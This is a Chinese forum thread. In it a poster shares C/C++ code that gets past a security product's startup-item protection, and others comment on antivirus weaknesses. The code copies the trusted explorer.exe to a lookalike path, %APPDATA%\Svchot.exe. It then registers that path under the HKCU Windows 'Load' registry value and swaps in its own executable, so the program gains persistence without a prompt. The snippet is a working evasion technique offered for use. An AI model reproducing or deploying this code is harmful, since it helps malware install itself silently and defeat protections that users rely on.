绕过管家写启动项，求转正

Evil0r

简单的测试了下，发现写hkcu的run键值的时候，管家如果目标指向的程序是可信任程序，管家是不会提示的，比如系统程序，但是目标程序不存在或者不是白程序，那么管家就会提示，所以，写的时候先复制一个可信任程序过去，然后再将要写启动的程序覆盖掉它就可以了。
代码：
TCHAR szMyself[MAX_PATH] = {0};//自身路径
        GetModuleFileName(NULL,szMyself,MAX_PATH);
        TCHAR szRunPath[MAX_PATH] = {0};//启动的路径
        ExpandEnvironmentStrings(_T("%APPDATA%\\Svchot.exe"),szRunPath,MAX_PATH);
        TCHAR szExeplorer[MAX_PATH] = {0};//szExeplorer路径
        GetSystemDirectory(szExeplorer,MAX_PATH);
        _tcscat(szExeplorer,_T("\\explorer.exe"));
CopyFile(szExeplorer,szRunPath,FALSE);
                Sleep(1000);
                SHSetValue(HKEY_CURRENT_USER,_T("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows"),_T("Load"),REG_SZ,szRunPath,_tcslen(szRunPath)*sizeof(TCHAR));
                Sleep(200);
                CopyFile(szMyself,szRunPath,FALSE)

这样就可以了，无提示写hkcu的启动项

Evil0r

两年了转个正这么难

卡布达

俺也想转正

earthborn

啥叫转正……有啥好处？发工资吗？

真小读者

不要自占沙发

旷月108

记得管家8.7主防完善版增加了对利用系统程序绕过主防写启动项的拦截，还是没hold住？
PS  两年才16积分，这账号也荒废得忒那啥了....

Evil0r

旷月108 发表于 2014-1-2 23:23
记得管家8.7主防完善版增加了对利用系统程序绕过主防写启动项的拦截，还是没hold住？
PS  两年才16积 ...

管家主防真心不给力，很多几年前拿来过360的方法对它都有效

kfd35

过世界倒数第一有意思吗

wjhstu-VxG

管家的主防的确有点那啥……

Evil0r

Evil0r 发表于 2014-1-3 13:40
管家主防真心不给力，很多几年前拿来过360的方法对它都有效

卡巴红伞之类的对hkcu的run基本上都不拦呢。。。。